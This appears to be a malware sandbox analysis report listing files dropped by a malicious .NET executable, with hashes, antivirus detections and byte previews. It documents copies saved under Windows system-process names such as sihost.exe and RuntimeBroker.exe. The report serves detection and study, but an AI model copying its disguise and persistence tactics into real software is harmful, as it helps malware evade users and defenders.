Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.74732776737678
Encrypted:	false
SSDEEP:	6:RPqCcS2gQsqafv1cwHtWq/oP4Gi4isrz8kHJ0kRX29e:djFLWwHtt/SfnPUkp0k5r
MD5:	0675EF42906D734228A5C1E642D6DA72
SHA1:	95D21AADABC6931CC81AF1DDBEBD74604A3866A8
SHA-256:	FE75D6C111D64810DB3EF1D0F1F765DA50274222E00031FAE42FB26C614B397D
SHA-512:	D4526522A496CA4673A588FBFA0E420BC4862D160BABF02FCABD5CDB86A31479098BF3840B099D8E49C9D9CBF5A8F005AF5BD987172A66BF51EE7141BAEF3E73
Malicious:	false
Preview:	4wdAB4ioTFctgtqGZOwcoCinL9Of9r5L9qUZFyptAhMZwZShzIphUpk2NzzCpDolKQtzYQBkiCbHzJ0vqqq1CY1TFbMP9mE72lPgpcIiHF8SOdCE9DW9WxjwYZu6Ewk58dOO4UGOhHu6ZjFmYHQ5QEkFCdHPsMdUeDTuPyKo7IbPDmWzUIh7goo32IMaN0fVnZcWPVWk7l7InVCZGR5kogyzYa1HmtbHmGloKAk8v7A4qgPhGwU545rHkm8yd

C:\ProgramData\sihost.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\sihost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\0b15d056fd0733

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with very long lines (992), with no line terminators
Category:	dropped
Size (bytes):	992
Entropy (8bit):	5.924959613328881
Encrypted:	false
SSDEEP:	24:lTS3BqHTAJzr7AwJYBioyr+w9cG6+aO1eegUyEv5Ja9IyLAjpTpI:AcHTAJnMyr5cGjmeg2Ja9I2AjPI
MD5:	E4153C9C57AC2C0A5AA4FB1C276FB87F
SHA1:	0E5666658879A81C179C3019835FBBE8E697F25A
SHA-256:	100F73BD31E9522FBDB183D130852224A653639C77A3DE5C5ED7EC6785288CE1
SHA-512:	B49267D34EC990DC3115DE29D275971614B2ABDF737CE6F4EF25D0414AA70A293D5A3B018CFCA594750EEB4542646661FB4A1107158C6745CD57815D8F4C5525
Malicious:	false
Preview:	YYC7aGNFLAcLXoZidmtMjXGu3fc6UlPWkYw5WY1Zy5cejPidSdixVbZASSD5nRujuFl91dMFvTXo5mKn69o1DcBI9vnDU5vhK2ueojlzRcCBDuFqIa9om3gSDc9G0Ivzi0dC1p8WXyjkZAFOq7536G4RVbaMkf8IrMcMQCycbnRyT62DWvZ3N13b5MraOvw10b2Mh27oIdcTzG7ZjX0yGF40TAREUYNp1Z72DpfexvuuZjmzPS0157vugC3gl3TuPwcZIFV41VAUUKatXbzChVu3oNVAw824b9enHNqJ669j6aaWmJIJEQN4Ciu5tUI2dF2UqxmKupGlVK6Nw9Ym0s0LwkljdvZmxHG1hFqyh8ZYKli2mgIu5fCuPriFMDq9PdxODFqrSjF1TbBLBt66mpqSEWm0hkmeSZJqyTyg0bcVZLaxqWDdGuWkweJqdzKs7lj4RUWs4aFLMV336yJKgJXhDj4TJHDAQtYxmgfWAVippKXblQuoqALxNB0saDiwWE5c6GQZTxKKks22Mcr2XYUQikjkpx66xwSkP4ffAUU30BMfJ8f7VpZ7uo4Vgpug1NXyZRmS7M2CEbahYDbrR8kIXU0l9J8UkyCmnYG1VNAJwW3SOX7dODP2mPbEbBSxNicPZy397jVD8bVBbhXlMfFgiJ9Y7CaU4M5O3o3Ze7gorL4L3an3orlsc5qPyeC4JBJvgHHwo7HO9ayXPyegZgpNkMv77nl94lfqCIowS0PqkWsBHTAAAgfnV5KTWKzAWHUY5IVGJsOiQ8nOdt0nmk9YF1UG8UaIAPUcCUF8740RR6XWR60mTLYvI5SExOIyRFiBoLLJn2pstrGIe8yBexzy1jUGCBKtwCAMYWsGur8bfpBazJjzZGUeQtJE0FGlr65rr3tIQrRxyXTLh3Q2cVTqrg6pMnQpkXtjuUt5Zbjsygp2a8h6yNJWnP9L7E6mbmNbotaMKVdAvl1L1DPNFT0WNX6eUh7V

C:\Recovery\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	114
Entropy (8bit):	5.554620063174467
Encrypted:	false
SSDEEP:	3:YD/N0JARruncDTz8JaTimHOYKbO:u/NMS+U5OmHDwO
MD5:	144BE3FF7D021C160B5AAB65CC47F8D3
SHA1:	6E1722A9AA2DE6EE7A07C9C517F32A32D373E7B6
SHA-256:	6DB1F19CBC3121346F2582CE8CA60360DAD1ADD2E7341200F4703FC9CC68EE5E
SHA-512:	4C89B6306055765FA8563CC504C06548576029963AEC6F912EAA1CB7941E6CB4AAB95C0C63C8DB4B9FA64B47C4266566364CA74F718E520C164C0FEFAD7A3313
Malicious:	false
Preview:	WR4f1CRhbStBm810X5YxVetNcAXFqcUy7ESPRdEkgZCuvZP4YocnzEv2iqC1pL0885Eiqmi30yQ6b8bDucqC9q82TZrlaN5UiEv0VrOvFiwBxyajP9

C:\Recovery\MwDxnowBVCiAiIllnkPs.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\RuntimeBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MwDxnowBVCiAiIllnkPs.exe.log

Download File

Process:	C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Download File

Process:	C:\Recovery\RuntimeBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SgrmBroker.exe.log

Download File

Process:	C:\Windows\twain_32\SgrmBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jmBb9uY1B8.exe.log

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
MD5:	5D3E8414C47C0F4A064FA0043789EC3E
SHA1:	CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
SHA-256:	4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
SHA-512:	74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Download File

Process:	C:\ProgramData\sihost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Windows\IME\IMETC\HELP\0b15d056fd0733

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with very long lines (810), with no line terminators
Category:	dropped
Size (bytes):	810
Entropy (8bit):	5.910403815905239
Encrypted:	false
SSDEEP:	12:9SWpMJ+hS/gyArUXHiIAWH9re5bKpKHSjoZrTPXYKXod1ghEbiTcRItZ2x:9SWEg+SONe5bKpkS0ZrLoKXgghEGwa4
MD5:	E8CBE689578A7679FA0F2294317DE43E
SHA1:	DA3D26811EC8FC23728667BF84FE193B94BD3E41
SHA-256:	0EF04E275F6A37F290484F083A162D76D98F1A4D713B13A7BAD889972A5F4B4F
SHA-512:	296EF6F6E81843DE9C5590AB9EA69B2C80153C9294F55E10CA75228099EA6C61CD347FA69234845EE839E2814EEA6DC0522E03777E9D189E34E22E1142F0BBC8
Malicious:	false
Preview:	QJu9beuoUjgzkIm9DUHsbQh2NB2rnqoMqO063hGVl8zNo2bvS0RkbMWAl2wZlCBo5TJWRpFfNwHdaUNUkGZwYEve10UBuqti6LSUtEdmuwWpE3jRobzfnOQ0ioebVEugCjgPB3lgmwBmrGa8QDWT1O4s4bwEjCRpB0mfWUPvzS21MnJcOgKRsboyoxUjGh6keVk0d5l6xkdiWDfRSUzD2A7jLy0i9qoSWSX0DS8T4NeI8FblSDRwr3reYBooEC7H5KMEppN9VfIpfzkGWOQ6Y2kck2bBoTP1QXMy3X5mzSaLuC8jaiRzwAsDjtdxNLVCQQYInwN9TnGGbYsi42lFBZFPpIOJ4IZn7Y4dn06nVSgI3llLB52VkPA1LJdeiDFLOcJDeO4E67ut27VDhDI8PEDrYDSeWcFRNV3abhqwAyYmeQ8OxZ7f5G5KZbpa6ard2cfhD4m9WV7bpaMHEDr7ejVGZtBA2Q0kH5uCubK2x7JkIef8OiW2st9SHZHU3mGGeXTuqKWn3yKhav85OCvU371X5b4VT09L1CFvKuSDLt94ib1VaMF00vMgf6yOPAUCz9pYpMvdurIK87yekj4GuIUF0iQN6DyLY7FjwdqOamFJmCihHUoqFNRqpkhG6hhr37vB2PrG2qpICKcxAsGmYHFLpY3L5jS3FYQpRhp2mixYhJneHuGNb5Tv2jWeVfLTYwCo4xgdDN9zTqofuZELcEcKEewrLLgGXeAvG8kUNnKN5dcL50t6b90UT2kZAyS2r2cyq3Zwyt7z4POkBlwUbkpXnqbNYKUYVRgCAneBb6

C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\PLA\Templates\0b15d056fd0733

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.75389976368227
Encrypted:	false
SSDEEP:	6:y6fzK9mPjFj3VFirt2GsSiRUJTgXd4LtakTO+X5A1/0J3E/GKfq:y6Lyk3VYrw7RGId4LtakTO+X5mS3E/Gx
MD5:	B04BDDE8107DBBE4513DBB1F512F8237
SHA1:	D8A83B806458124F16064C2811F42B6013B4CF5D
SHA-256:	10A753BDA93FEC548A865307F1FBE1D85974405068F70104D30E045B62ABDA9F
SHA-512:	4B86226FD5F1A6A8C3E35FDB43C4F633B65D852D5E98DCB9B0379C7122CE12D26EABBB4EF535130D6336FE19E7C4DA990404984EBF312AA7EB3FFDA9AA691151
Malicious:	false
Preview:	Gr6yqg3J1KUBzZfNrYdDhCweg9wu0AswrgNO7GAkqdGnJOIyonzIRUrE5cSrtJS1chTSLRPkX2XE5IVS08GNKjfXyJTfxT1hKOLl40mWXOvY7nIwGA1vCFq2C6dB8uwEBz4r7tXAVuz6yHZLBgYxbFeEhSj8WkXnbqWHsbzXn1ZSQuD5gRAbV9m5V0JoJYnvWLfHuSdjrAJkqLxxPocEj6RbEbv2RKNONn6EP5LOybuUzBPKCWZf6jLa4DDSglSgx4WCO

C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
